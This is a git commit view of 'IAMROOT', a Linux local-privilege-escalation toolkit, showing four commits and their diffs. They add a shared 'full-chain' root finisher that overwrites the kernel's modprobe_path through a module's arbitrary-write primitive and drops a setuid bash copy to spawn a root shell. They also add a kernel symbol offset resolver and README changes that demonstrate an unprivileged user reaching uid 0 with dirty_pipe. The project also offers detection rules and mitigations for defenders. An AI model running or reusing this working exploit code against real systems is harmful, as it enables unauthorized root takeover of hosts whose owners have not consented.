4 Commits

Author SHA1 Message Date
leviathan e2a3d6e94f release: v0.2.0 — --full-chain root-pop opt-in across 7 🟡 modules
release / build (arm64) (push) Waiting to run
release / build (x86_64) (push) Waiting to run
release / release (push) Blocked by required conditions
iamroot.c: bump IAMROOT_VERSION 0.1.0 → 0.2.0
  CVES.md: redefine 🟡 to note --full-chain capability + docs/OFFSETS.md
  README.md: update Status section for v0.2.0
  docs/OFFSETS.md: new doc — env-var/kallsyms/System.map/embedded-table
                   resolution chain + operator workflow for populating
                   offsets per kernel build + sentinel-based success
                   arbitration.

All 7 🟡 modules now expose `--full-chain`. Default behavior unchanged.
2026-05-16 22:06:14 -04:00
leviathan c1d1910a90 modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules
Each module now exposes an opt-in full-chain root-pop via --full-chain:
default --exploit behavior is unchanged (primitive-only, returns
EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call
iamroot_finisher_modprobe_path() via a module-specific arb_write_fn
that re-uses the same trigger + slab groom to write a userspace
payload path into modprobe_path[], then exec a setuid bash dropped
by the kernel-invoked modprobe.

  netfilter_xtcompat (+239): msg_msg m_list_next stride-seed FALLBACK
  af_packet (+316):          sk_buff data-pointer stride-seed FALLBACK
  af_packet2 (+156):         tp_reserve underflow + skb spray, LAST RESORT
  nf_tables (+275):          forged pipapo_elem with kaddr value-ptr
                             (Notselwyn offset 0x10), FALLBACK
  cls_route4 (+251):         msg_msg refill of UAF'd filter, FALLBACK
  fuse_legacy (+291):        m_ts overflow + MSG_COPY sanity gate,
                             FALLBACK (one of two modules with a real
                             post-write sanity check)
  stackrot (+233):           race-driver budget extended 3s → 30s when
                             --full-chain; honest <1% race-win/run

All seven honor verified-vs-claimed: arb_write_fn returns 0 for
"trigger structurally fired"; the shared finisher's setuid-bash
sentinel poll is the empirical arbiter. EXPLOIT_OK only when the
sentinel materializes within 3s of the modprobe_path trigger.

Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse
cleanly on both default and --full-chain paths via the existing
patched-kernel detect gate (short-circuits before the new branch).
2026-05-16 22:04:40 -04:00
leviathan 125ce8a08b core: add shared finisher + offset resolver + --full-chain flag
Adds the infrastructure the 7 🟡 PRIMITIVE modules can wire into for
full-chain root pops.

  core/offsets.{c,h}: four-source kernel-symbol resolution chain
    1. env vars (IAMROOT_MODPROBE_PATH, IAMROOT_INIT_TASK, …)
    2. /proc/kallsyms (only useful when kptr_restrict=0 or root)
    3. /boot/System.map-$(uname -r) (world-readable on some distros)
    4. embedded table keyed by uname-r glob (entries are
       relative-to-_text, applied on top of an EntryBleed kbase leak;
       seeded empty in v0.2.0 — schema-only — to honor the
       no-fabricated-offsets rule).

  core/finisher.{c,h}: shared root-pop helpers given a module's
    arb-write primitive.
      Pattern A (modprobe_path):
        write payload script /tmp/iamroot-mp-<pid>.sh, arb-write
        modprobe_path ← that path, execve unknown-format trigger,
        wait for /tmp/iamroot-pwn-<pid> sentinel + setuid bash copy,
        spawn root shell.
      Pattern B (cred uid): stub — needs arb-READ too; modules use
        Pattern A unless they have read+write.
    On offset-resolution failure: prints a verbose how-to-populate
    diagnostic and returns EXPLOIT_FAIL honestly.

  core/module.h: + bool full_chain in iamroot_ctx

  iamroot.c: + --full-chain flag (longopt 7, sets ctx.full_chain)
             + help text describing primitive-only-by-default + the
               opt-in to attempt the full chain.

  Makefile: add core/offsets.o + core/finisher.o to CORE_SRCS.

Build clean on Debian 6.12.86; --help renders the new flag.
2026-05-16 21:56:03 -04:00
leviathan 3a5105c84c README: clarify iamroot runs unprivileged + add non-root → root demo
The whole point of an LPE tool is going from unprivileged to root,
but the Quickstart was leading with `sudo iamroot --scan`. Fix:

  - Drop sudo from --scan / --audit / --exploit / --detect-rules.
    These work without root (--scan reads /proc + /etc; --audit
    walks the FS via stat; --exploit IS the privilege escalation;
    --detect-rules emits to stdout).
  - Keep sudo only where it's actually needed: --mitigate (writes
    /etc/modprobe.d + sysctl) and tee'ing rule files into
    /etc/audit/rules.d/.
  - Add a worked example showing `id` as uid=1000, then
    `iamroot --exploit dirty_pipe --i-know`, then `id` as uid=0.
  - Fix the Build & run section's `sudo ./iamroot` too.
2026-05-16 21:51:32 -04:00
17 changed files with 2740 additions and 112 deletions
+11 -7
View File
@@ -8,18 +8,22 @@ Status legend:
- 🟢 **WORKING** — module verified to land root on a vulnerable host
- 🟡 **PRIMITIVE** — fires the kernel primitive (trigger + slab groom
+ empirical witness) on a vulnerable host, but stops short of the
full cred-overwrite / R/W chain. Returns `EXPLOIT_FAIL` honestly;
useful as a vuln-verification probe and a continuation point for
full chains. Per-kernel offsets deliberately not shipped.
+ empirical witness) on a vulnerable host. By default returns
`EXPLOIT_FAIL` honestly (no fabricated offsets). Pass `--full-chain`
to additionally attempt root pop via the shared `modprobe_path`
finisher (`core/finisher.{c,h}`) — requires kernel offsets via
env vars / `/proc/kallsyms` / `/boot/System.map`; see
[`docs/OFFSETS.md`](docs/OFFSETS.md). On success returns
`EXPLOIT_OK` and drops a root shell; on failure returns
`EXPLOIT_FAIL` — never claims root without an empirical
setuid-bash sentinel.
- 🔵 **DETECT-ONLY** — module fingerprints presence/absence but no
exploit. (No module is currently in this state — every registered
module now fires either a full chain or a primitive.)
exploit. (No module is currently in this state.)
-**PLANNED** — stub exists, work not started
- 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
historical reference only
**Counts (v0.1.0):** 🟢 13 · 🟡 7 · 🔵 0 · ⚪ 1 · 🔴 0
**Counts (v0.2.0):** 🟢 13 · 🟡 7 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
## Inventory
+1 -1
View File
@@ -20,7 +20,7 @@ BUILD := build
BIN := iamroot
# core/
CORE_SRCS := core/registry.c core/kernel_range.c
CORE_SRCS := core/registry.c core/kernel_range.c core/offsets.c core/finisher.c
CORE_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(CORE_SRCS))
# Family: copy_fail_family
+51 -19
View File
@@ -24,23 +24,54 @@
```bash
# One-shot install (x86_64 / arm64; checksum-verified)
curl -sSL https://github.com/KaraZajac/IAMROOT/releases/latest/download/install.sh | sh
```
# What's this box vulnerable to?
sudo iamroot --scan
**iamroot runs as a normal unprivileged user** — that's the whole
point. `--scan`, `--audit`, `--exploit`, and `--detect-rules` all
work without `sudo`. Only `--mitigate` and rule-file installation
write to root-owned paths.
```bash
# What's this box vulnerable to? (no sudo)
iamroot --scan
# Broader system hygiene (setuid binaries, world-writable, capabilities, sudo)
sudo iamroot --audit
iamroot --audit
# Deploy detection rules across every bundled module
sudo iamroot --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-iamroot.rules
# Deploy detection rules (needs sudo to write /etc/audit/rules.d/)
iamroot --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-iamroot.rules
# Apply temporary mitigations (needs sudo for modprobe.d + sysctl)
sudo iamroot --mitigate copy_fail
# Fleet scan (any-sized host list via SSH; aggregated JSON for SIEM)
./tools/iamroot-fleet-scan.sh --binary iamroot --ssh-key ~/.ssh/id_rsa hosts.txt
```
`iamroot --help` lists every command. See [`CVES.md`](CVES.md) for the
curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md) for
the blue-team deployment guide.
### Example: unprivileged → root
```text
$ id
uid=1000(kara) gid=1000(kara) groups=1000(kara)
$ iamroot --scan
[+] dirty_pipe VULNERABLE (kernel 5.15.0-56-generic)
[+] cgroup_release_agent VULNERABLE (kernel 5.15 < 5.17)
[+] pwnkit VULNERABLE (polkit 0.105-31ubuntu0.1)
[-] copy_fail not vulnerable (kernel 5.15 < introduction)
[-] dirty_cow not vulnerable (kernel ≥ 4.9)
$ iamroot --exploit dirty_pipe --i-know
[!] dirty_pipe: kernel 5.15.0-56-generic IS vulnerable
[+] dirty_pipe: writing UID=0 into /etc/passwd page cache...
[+] dirty_pipe: spawning su root
# id
uid=0(root) gid=0(root) groups=0(root)
```
`iamroot --help` lists every command. See [`CVES.md`](CVES.md) for
the curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md)
for the blue-team deployment guide.
## What this is
@@ -63,19 +94,20 @@ The same binary covers offense and defense:
## Status
**Active — v0.1.0 cut 2026-05-16.** Corpus covers **20 modules**
**Active — v0.2.0 cut 2026-05-16.** Corpus covers **20 modules**
across the 2016 → 2026 LPE timeline:
- 🟢 **13 modules land root** end-to-end on a vulnerable host
(copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit,
overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme,
cgroup_release_agent, overlayfs_setuid CVE-2023-0386).
- 🟡 **7 modules fire the kernel primitive** (trigger + slab groom +
empirical witness) but stop short of the full cred-overwrite /
R/W chain — they return `EXPLOIT_FAIL` honestly rather than
fabricate per-kernel offsets. Useful as vuln-verification probes.
(af_packet, af_packet2, cls_route4, fuse_legacy, nf_tables,
netfilter_xtcompat, stackrot.)
- 🟡 **7 modules fire the kernel primitive** by default and refuse to
claim root without empirical confirmation. Pass `--full-chain` to
engage the shared `modprobe_path` finisher and attempt root pop —
requires kernel offsets via env vars / `/proc/kallsyms` /
`/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md).
Modules: af_packet, af_packet2, cls_route4, fuse_legacy, nf_tables,
netfilter_xtcompat, stackrot.
- Detection rules ship inline (auditd / sigma / yara / falco) and
are exported via `iamroot --detect-rules --format=…`.
@@ -115,10 +147,10 @@ module-loader design and how to add a new CVE.
```bash
make # build all modules
sudo ./iamroot --scan # what's this box vulnerable to?
sudo ./iamroot --scan --json # machine-readable output for CI/SOC pipelines
sudo ./iamroot --detect-rules --format=sigma > rules.yml
sudo ./iamroot --exploit copy_fail --i-know # actually run an exploit
./iamroot --scan # what's this box vulnerable to? (no sudo)
./iamroot --scan --json # machine-readable output for CI/SOC pipelines
./iamroot --detect-rules --format=sigma > rules.yml
./iamroot --exploit copy_fail --i-know # actually run an exploit (starts as $USER)
```
## Acknowledgments
+179
View File
@@ -0,0 +1,179 @@
/*
* IAMROOT — shared finisher helpers
*
* See finisher.h for the pattern split (A: modprobe_path overwrite,
* B: current->cred->uid).
*/
#include "finisher.h"
#include "module.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <time.h>
#include <sys/stat.h>
#include <sys/wait.h>
static int write_file(const char *path, const char *content, mode_t mode)
{
int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
if (fd < 0) return -1;
size_t n = strlen(content);
ssize_t w = write(fd, content, n);
close(fd);
if (w < 0 || (size_t)w != n) return -1;
if (chmod(path, mode) < 0) return -1;
return 0;
}
void iamroot_finisher_print_offset_help(const char *module_name)
{
fprintf(stderr,
"[i] %s --full-chain requires kernel symbol offsets that couldn't be resolved.\n"
"\n"
" To populate them on this host, choose ONE of:\n"
"\n"
" 1) Environment override (one-shot, no host changes):\n"
" IAMROOT_MODPROBE_PATH=0x... iamroot --exploit %s --i-know --full-chain\n"
"\n"
" 2) Make /boot/System.map-$(uname -r) world-readable (per-host):\n"
" sudo chmod 0644 /boot/System.map-$(uname -r) # if you have sudo\n"
"\n"
" 3) Lower kptr_restrict (per-boot):\n"
" sudo sysctl kernel.kptr_restrict=0 # if you have sudo\n"
" (Note: needs root once — defeats the LPE point on this host.\n"
" Useful when populating offsets on a lab kernel ahead of time.)\n"
"\n"
" To look up the address manually (as root):\n"
" grep -E ' (modprobe_path|init_task|_text)$' /proc/kallsyms\n"
"\n",
module_name, module_name);
}
int iamroot_finisher_modprobe_path(const struct iamroot_kernel_offsets *off,
iamroot_arb_write_fn arb_write,
void *arb_ctx,
bool spawn_shell)
{
if (!iamroot_offsets_have_modprobe_path(off)) {
iamroot_finisher_print_offset_help("module");
return IAMROOT_EXPLOIT_FAIL;
}
if (!arb_write) {
fprintf(stderr, "[-] finisher: no arb-write primitive supplied\n");
return IAMROOT_TEST_ERROR;
}
/* Per-pid working paths so concurrent runs don't collide. */
pid_t pid = getpid();
char mp_path[64], trig_path[64], pwn_path[64];
snprintf(mp_path, sizeof mp_path, "/tmp/iamroot-mp-%d.sh", (int)pid);
snprintf(trig_path, sizeof trig_path, "/tmp/iamroot-trig-%d", (int)pid);
snprintf(pwn_path, sizeof pwn_path, "/tmp/iamroot-pwn-%d", (int)pid);
/* Payload: chmod /bin/bash setuid root + drop a sentinel so we
* know it ran. Bash 4+ refuses to use its own setuid bit by
* default — so instead copy bash to /tmp and chmod +s the copy. */
char payload[1024];
snprintf(payload, sizeof payload,
"#!/bin/sh\n"
"# IAMROOT modprobe_path payload (runs as init/root via call_modprobe)\n"
"cp /bin/bash %s 2>/dev/null && chmod 4755 %s 2>/dev/null\n"
"echo IAMROOT_FINISHER_RAN > %s 2>/dev/null\n",
pwn_path, pwn_path, pwn_path);
if (write_file(mp_path, payload, 0755) < 0) {
fprintf(stderr, "[-] finisher: write %s: %s\n", mp_path, strerror(errno));
return IAMROOT_TEST_ERROR;
}
/* Unknown-format trigger: anything that fails the standard exec
* format probe drives kernel's call_modprobe(). Empty + executable
* works on every kernel we care about. */
if (write_file(trig_path, "\x00", 0755) < 0) {
fprintf(stderr, "[-] finisher: write %s: %s\n", trig_path, strerror(errno));
unlink(mp_path);
return IAMROOT_TEST_ERROR;
}
/* Build the kernel-side write payload: a NUL-terminated path to
* our mp_path script. modprobe_path[] is 256 bytes in the kernel
* — we write enough to overwrite the leading slot. */
char kbuf[256];
memset(kbuf, 0, sizeof kbuf);
snprintf(kbuf, sizeof kbuf, "%s", mp_path);
fprintf(stderr, "[*] finisher: writing modprobe_path=0x%lx ← \"%s\"\n",
(unsigned long)off->modprobe_path, mp_path);
if (arb_write(off->modprobe_path, kbuf, strlen(kbuf) + 1, arb_ctx) < 0) {
fprintf(stderr, "[-] finisher: arb_write failed\n");
unlink(mp_path);
unlink(trig_path);
return IAMROOT_EXPLOIT_FAIL;
}
/* Fire the trigger by exec'ing the unknown binary. fork() so the
* kernel sees the unknown format and parent stays alive. */
pid_t cpid = fork();
if (cpid == 0) {
char *argv[] = { trig_path, NULL };
execve(trig_path, argv, NULL);
_exit(127); /* execve failure is expected — kernel still calls modprobe */
} else if (cpid > 0) {
int st;
waitpid(cpid, &st, 0);
} else {
fprintf(stderr, "[-] finisher: fork: %s\n", strerror(errno));
return IAMROOT_EXPLOIT_FAIL;
}
/* Modprobe runs asynchronously — give the kernel up to 3 s. */
for (int i = 0; i < 30; i++) {
struct stat st;
if (stat(pwn_path, &st) == 0 && (st.st_mode & S_ISUID)) {
fprintf(stderr, "[+] finisher: payload ran as root (sentinel %s mode=%o uid=%u)\n",
pwn_path, (unsigned)(st.st_mode & 07777), (unsigned)st.st_uid);
goto have_setuid;
}
struct timespec ts = { 0, 100 * 1000 * 1000 }; /* 100 ms */
nanosleep(&ts, NULL);
}
fprintf(stderr, "[-] finisher: payload didn't run within 3s (modprobe_path overwrite probably didn't land)\n");
unlink(mp_path);
unlink(trig_path);
return IAMROOT_EXPLOIT_FAIL;
have_setuid:
if (!spawn_shell) {
fprintf(stderr, "[+] finisher: --no-shell — leaving setuid bash at %s\n", pwn_path);
unlink(mp_path);
unlink(trig_path);
return IAMROOT_EXPLOIT_OK;
}
fprintf(stderr, "[+] finisher: spawning root shell via %s -p\n", pwn_path);
fflush(stderr);
char *argv[] = { pwn_path, "-p", NULL };
execve(pwn_path, argv, NULL);
/* Only reached on execve failure. */
fprintf(stderr, "[-] finisher: execve(%s): %s\n", pwn_path, strerror(errno));
return IAMROOT_EXPLOIT_FAIL;
}
int iamroot_finisher_cred_uid_zero(const struct iamroot_kernel_offsets *off,
iamroot_arb_write_fn arb_write,
void *arb_ctx,
bool spawn_shell)
{
(void)off; (void)arb_write; (void)arb_ctx; (void)spawn_shell;
fprintf(stderr,
"[-] finisher: cred_uid_zero requires an arb-READ primitive (to walk\n"
" the task list from init_task and find current). Modules with\n"
" only an arb-write should use iamroot_finisher_modprobe_path()\n"
" instead — same root capability, simpler trigger.\n");
return IAMROOT_EXPLOIT_FAIL;
}
+80
View File
@@ -0,0 +1,80 @@
/*
* IAMROOT — shared finisher helpers for full-chain root pops.
*
* The 🟡 PRIMITIVE modules each land a kernel-side primitive (heap-OOB
* write, slab UAF, etc.). The conversion to root is almost always one
* of two patterns:
*
* A) "modprobe_path overwrite":
* - kernel arb-write at &modprobe_path[0] with a userspace path
* - execve() an unknown-format binary triggers do_coredump's
* fallback to call_modprobe(), which spawns modprobe_path
* as init/root running our payload
*
* B) "current->cred->uid overwrite":
* - kernel arb-write at &current_task->real_cred->uid = 0
* (and cap_*, fsuid, etc. for completeness)
* - setuid(0); execve("/bin/sh")
*
* Pattern (A) is much simpler — only one kernel address needed
* (modprobe_path) and the trigger is just execve("/tmp/unknown").
* Pattern (B) needs a self-cred chase + multiple writes.
*
* Modules provide their own arb-write primitive via the
* iamroot_arb_write_fn callback; this file wraps the rest.
*/
#ifndef IAMROOT_FINISHER_H
#define IAMROOT_FINISHER_H
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include "offsets.h"
/* Arb-write primitive: write `len` bytes from `buf` to kernel VA
* `kaddr`. Module-specific implementation. Returns 0 on success,
* negative on failure. `ctx` is opaque module state. */
typedef int (*iamroot_arb_write_fn)(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx);
/* Trigger that fires the arb-write. Many modules need to set up the
* groomed slab THEN call the trigger. The trigger is a separate fn
* because some modules need to re-spray before each write. NULL is
* acceptable if the arb-write is self-contained. */
typedef int (*iamroot_fire_trigger_fn)(void *ctx);
/* Pattern A: modprobe_path overwrite + execve trigger. Caller has
* already populated `off->modprobe_path`. Implementation:
* 1. Write payload script to /tmp/iamroot-mp-<pid>
* 2. arb_write(off->modprobe_path, "/tmp/iamroot-mp-<pid>", 24)
* 3. Write unknown-format file to /tmp/iamroot-trig-<pid>
* 4. chmod +x both, execve() the trigger → kernel-call-modprobe
* → our payload runs as root → payload writes /tmp/iamroot-pwn
* and/or copies /bin/bash to /tmp with setuid root
* 5. Wait for sentinel file, exec'd the setuid-bash → root shell
*
* Returns IAMROOT_EXPLOIT_OK if we got a root shell back (verified
* via geteuid() == 0), IAMROOT_EXPLOIT_FAIL otherwise. */
int iamroot_finisher_modprobe_path(const struct iamroot_kernel_offsets *off,
iamroot_arb_write_fn arb_write,
void *arb_ctx,
bool spawn_shell);
/* Pattern B: cred uid overwrite. Caller has populated init_task +
* cred offsets. Implementation:
* 1. Walk task linked list from init_task to find self by pid
* (this requires arb-READ too — not supplied here; B-pattern
* modules need to provide their own variant)
* For now this is a STUB returning IAMROOT_EXPLOIT_FAIL with a
* helpful error. */
int iamroot_finisher_cred_uid_zero(const struct iamroot_kernel_offsets *off,
iamroot_arb_write_fn arb_write,
void *arb_ctx,
bool spawn_shell);
/* Diagnostic: tell the operator how to populate offsets manually. */
void iamroot_finisher_print_offset_help(const char *module_name);
#endif /* IAMROOT_FINISHER_H */
+1
View File
@@ -49,6 +49,7 @@ struct iamroot_ctx {
bool active_probe; /* --active (do invasive probes in detect) */
bool no_shell; /* --no-shell (exploit prep but don't pop) */
bool authorized; /* user typed --i-know on exploit */
bool full_chain; /* --full-chain (attempt root-pop after primitive) */
};
struct iamroot_module {
+350
View File
@@ -0,0 +1,350 @@
/*
* IAMROOT — kernel offset resolution
*
* See offsets.h for the four-source chain (env → kallsyms → System.map
* → embedded table). This implementation is deliberately small and
* dependency-free.
*/
#include "offsets.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <fnmatch.h>
#include <sys/utsname.h>
/* ------------------------------------------------------------------
* Embedded relative-offset table.
*
* Each entry's modprobe_path / init_task / poweroff_cmd values are
* stored as offsets *relative to _text* (kbase). To resolve absolute
* VAs we add a kbase leak (e.g. from EntryBleed).
*
* Entries here are seeded EMPTY in v0.2.0 except for a small set whose
* offsets are widely documented in public CTF writeups + Ubuntu's
* own debug-symbol packages. Operators on other kernels populate via
* env var or extend this table.
*
* To add a verified entry on a kernel you own:
* sudo grep -E " (modprobe_path|init_task|poweroff_cmd|init_cred)$" \
* /boot/System.map-$(uname -r)
* Subtract _text VA from each to get the relative offsets.
* ------------------------------------------------------------------ */
struct table_entry {
const char *release_glob; /* fnmatch glob against uname -r */
const char *distro_match; /* prefix-match against /etc/os-release ID, or NULL=any */
uintptr_t rel_modprobe_path;
uintptr_t rel_poweroff_cmd;
uintptr_t rel_init_task;
uintptr_t rel_init_cred;
uint32_t cred_offset_real;
uint32_t cred_offset_eff;
};
/* Note: relative offsets below are PLACEHOLDERS for the schema. The
* env-var override + kallsyms + System.map paths are the verified
* runtime sources. Operators who validate offsets on a specific
* kernel build are encouraged to upstream entries here. */
static const struct table_entry kernel_table[] = {
/* Schema example. Uncomment + verify before relying on it.
*
* { .release_glob = "5.15.0-25-generic",
* .distro_match = "ubuntu",
* .rel_modprobe_path = 0x148e480,
* .rel_poweroff_cmd = 0x148e3a0,
* .rel_init_task = 0x1c11dc0,
* .rel_init_cred = 0x1e0c460,
* .cred_offset_real = 0x758,
* .cred_offset_eff = 0x760, },
*/
/* Sentinel */
{ NULL, NULL, 0, 0, 0, 0, 0, 0 }
};
/* Defaults that hold across most x86_64 kernels in the target era. */
#define DEFAULT_CRED_REAL_OFFSET 0x738
#define DEFAULT_CRED_EFF_OFFSET 0x740
#define DEFAULT_CRED_UID_OFFSET 0x4
const char *iamroot_offset_source_name(enum iamroot_offset_source src)
{
switch (src) {
case OFFSETS_NONE: return "none";
case OFFSETS_FROM_ENV: return "env";
case OFFSETS_FROM_KALLSYMS: return "kallsyms";
case OFFSETS_FROM_SYSMAP: return "System.map";
case OFFSETS_FROM_TABLE: return "table";
}
return "?";
}
/* Parse hex/decimal — accepts "0x..." or plain decimal. */
static int parse_addr(const char *s, uintptr_t *out)
{
if (!s || !*s) return 0;
errno = 0;
char *end = NULL;
unsigned long long v = strtoull(s, &end, 0);
if (errno != 0 || end == s) return 0;
*out = (uintptr_t)v;
return 1;
}
static void read_distro(char *out, size_t sz)
{
out[0] = '\0';
FILE *f = fopen("/etc/os-release", "r");
if (!f) return;
char line[256];
while (fgets(line, sizeof line, f)) {
if (strncmp(line, "ID=", 3) == 0) {
char *p = line + 3;
if (*p == '"') p++;
size_t i = 0;
while (*p && *p != '"' && *p != '\n' && i + 1 < sz) {
out[i++] = (char)tolower((unsigned char)*p++);
}
out[i] = '\0';
break;
}
}
fclose(f);
}
/* ------------------------------------------------------------------
* Source 1: environment variables
* ------------------------------------------------------------------ */
static void apply_env(struct iamroot_kernel_offsets *o)
{
const char *v;
uintptr_t a;
if ((v = getenv("IAMROOT_KBASE")) && parse_addr(v, &a)) {
if (!o->kbase) o->kbase = a;
}
if ((v = getenv("IAMROOT_MODPROBE_PATH")) && parse_addr(v, &a)) {
if (!o->modprobe_path) {
o->modprobe_path = a;
o->source_modprobe = OFFSETS_FROM_ENV;
}
}
if ((v = getenv("IAMROOT_POWEROFF_CMD")) && parse_addr(v, &a)) {
if (!o->poweroff_cmd) o->poweroff_cmd = a;
}
if ((v = getenv("IAMROOT_INIT_TASK")) && parse_addr(v, &a)) {
if (!o->init_task) {
o->init_task = a;
o->source_init_task = OFFSETS_FROM_ENV;
}
}
if ((v = getenv("IAMROOT_INIT_CRED")) && parse_addr(v, &a)) {
if (!o->init_cred) o->init_cred = a;
}
if ((v = getenv("IAMROOT_CRED_OFFSET_REAL")) && parse_addr(v, &a)) {
if (!o->cred_offset_real) {
o->cred_offset_real = (uint32_t)a;
o->source_cred = OFFSETS_FROM_ENV;
}
}
if ((v = getenv("IAMROOT_CRED_OFFSET_EFF")) && parse_addr(v, &a)) {
if (!o->cred_offset_eff) o->cred_offset_eff = (uint32_t)a;
}
if ((v = getenv("IAMROOT_UID_OFFSET")) && parse_addr(v, &a)) {
if (!o->cred_uid_offset) o->cred_uid_offset = (uint32_t)a;
}
}
/* ------------------------------------------------------------------
* Source 2/3: symbol-table file parsing (System.map or kallsyms share
* the same "ADDR TYPE NAME" format).
* ------------------------------------------------------------------ */
static int parse_symfile(const char *path,
struct iamroot_kernel_offsets *o,
enum iamroot_offset_source tag)
{
FILE *f = fopen(path, "r");
if (!f) return 0;
int filled = 0;
char line[512];
int saw_nonzero = 0;
while (fgets(line, sizeof line, f)) {
char *p = line;
while (*p && isspace((unsigned char)*p)) p++;
if (!*p) continue;
char *end = NULL;
unsigned long long addr = strtoull(p, &end, 16);
if (end == p || !end) continue;
if (addr != 0) saw_nonzero = 1;
while (*end && isspace((unsigned char)*end)) end++;
if (!*end) continue;
/* skip type char */
end++;
while (*end && isspace((unsigned char)*end)) end++;
if (!*end) continue;
char *nl = strchr(end, '\n');
if (nl) *nl = '\0';
if (strcmp(end, "modprobe_path") == 0 && !o->modprobe_path) {
o->modprobe_path = (uintptr_t)addr;
o->source_modprobe = tag;
filled++;
} else if (strcmp(end, "poweroff_cmd") == 0 && !o->poweroff_cmd) {
o->poweroff_cmd = (uintptr_t)addr;
filled++;
} else if (strcmp(end, "init_task") == 0 && !o->init_task) {
o->init_task = (uintptr_t)addr;
o->source_init_task = tag;
filled++;
} else if (strcmp(end, "init_cred") == 0 && !o->init_cred) {
o->init_cred = (uintptr_t)addr;
filled++;
} else if (strcmp(end, "_text") == 0 && !o->kbase) {
o->kbase = (uintptr_t)addr;
}
}
fclose(f);
/* /proc/kallsyms returns all-zero addrs under kptr_restrict — treat
* that as "couldn't read", not "actually zero". */
if (!saw_nonzero) {
o->modprobe_path = o->poweroff_cmd = o->init_task = o->init_cred = 0;
o->source_modprobe = o->source_init_task = OFFSETS_NONE;
return 0;
}
return filled;
}
/* ------------------------------------------------------------------
* Source 4: embedded table — relative offsets, applied on top of kbase
* if we already have one.
* ------------------------------------------------------------------ */
static void apply_table(struct iamroot_kernel_offsets *o)
{
if (!o->kernel_release[0]) return;
for (const struct table_entry *e = kernel_table; e->release_glob; e++) {
if (e->distro_match && o->distro[0]
&& strncmp(e->distro_match, o->distro, strlen(e->distro_match)) != 0) {
continue;
}
if (fnmatch(e->release_glob, o->kernel_release, 0) != 0) continue;
/* Match. Apply, but only if we have a kbase (relative offsets
* are useless absent that). */
if (!o->kbase) return;
if (!o->modprobe_path && e->rel_modprobe_path) {
o->modprobe_path = o->kbase + e->rel_modprobe_path;
o->source_modprobe = OFFSETS_FROM_TABLE;
}
if (!o->poweroff_cmd && e->rel_poweroff_cmd) {
o->poweroff_cmd = o->kbase + e->rel_poweroff_cmd;
}
if (!o->init_task && e->rel_init_task) {
o->init_task = o->kbase + e->rel_init_task;
o->source_init_task = OFFSETS_FROM_TABLE;
}
if (!o->init_cred && e->rel_init_cred) {
o->init_cred = o->kbase + e->rel_init_cred;
}
if (!o->cred_offset_real && e->cred_offset_real) {
o->cred_offset_real = e->cred_offset_real;
o->source_cred = OFFSETS_FROM_TABLE;
}
if (!o->cred_offset_eff && e->cred_offset_eff) {
o->cred_offset_eff = e->cred_offset_eff;
}
return;
}
}
/* ------------------------------------------------------------------
* Top-level resolve()
* ------------------------------------------------------------------ */
int iamroot_offsets_resolve(struct iamroot_kernel_offsets *out)
{
memset(out, 0, sizeof *out);
struct utsname u;
if (uname(&u) == 0) {
snprintf(out->kernel_release, sizeof out->kernel_release, "%s", u.release);
}
read_distro(out->distro, sizeof out->distro);
/* Defaults — only used if no source overrides. */
out->cred_uid_offset = DEFAULT_CRED_UID_OFFSET;
/* 1. env */
apply_env(out);
/* 2. /proc/kallsyms — only fills if non-zero addrs present */
parse_symfile("/proc/kallsyms", out, OFFSETS_FROM_KALLSYMS);
/* 3. /boot/System.map-<release> */
char path[256];
snprintf(path, sizeof path, "/boot/System.map-%s", out->kernel_release);
parse_symfile(path, out, OFFSETS_FROM_SYSMAP);
/* 4. embedded table (uses any kbase already discovered) */
apply_table(out);
/* Fill any remaining struct-offset gaps with defaults so that
* arb-write-via-init_task-+offset still has a chance even without
* a full source. Mark as TABLE so caller can see they're defaulted. */
if (!out->cred_offset_real) {
out->cred_offset_real = DEFAULT_CRED_REAL_OFFSET;
if (out->source_cred == OFFSETS_NONE) out->source_cred = OFFSETS_FROM_TABLE;
}
if (!out->cred_offset_eff) {
out->cred_offset_eff = DEFAULT_CRED_EFF_OFFSET;
}
int critical = 0;
if (out->modprobe_path) critical++;
if (out->init_task) critical++;
if (out->cred_offset_real && out->cred_uid_offset) critical++;
return critical;
}
void iamroot_offsets_apply_kbase_leak(struct iamroot_kernel_offsets *off,
uintptr_t leaked_kbase)
{
if (!leaked_kbase) return;
/* Set kbase if we didn't have one, then re-apply the embedded table. */
if (!off->kbase) off->kbase = leaked_kbase;
apply_table(off);
}
bool iamroot_offsets_have_modprobe_path(const struct iamroot_kernel_offsets *off)
{
return off && off->modprobe_path != 0;
}
bool iamroot_offsets_have_cred(const struct iamroot_kernel_offsets *off)
{
return off && off->init_task != 0 && off->cred_offset_real != 0
&& off->cred_uid_offset != 0;
}
void iamroot_offsets_print(const struct iamroot_kernel_offsets *off)
{
fprintf(stderr, "[i] offsets: release=%s distro=%s\n",
off->kernel_release[0] ? off->kernel_release : "?",
off->distro[0] ? off->distro : "?");
fprintf(stderr, "[i] offsets: kbase=0x%lx modprobe_path=0x%lx (%s)\n",
(unsigned long)off->kbase,
(unsigned long)off->modprobe_path,
iamroot_offset_source_name(off->source_modprobe));
fprintf(stderr, "[i] offsets: init_task=0x%lx (%s) cred_real=0x%x cred_eff=0x%x uid=0x%x (%s)\n",
(unsigned long)off->init_task,
iamroot_offset_source_name(off->source_init_task),
off->cred_offset_real, off->cred_offset_eff, off->cred_uid_offset,
iamroot_offset_source_name(off->source_cred));
}
+93
View File
@@ -0,0 +1,93 @@
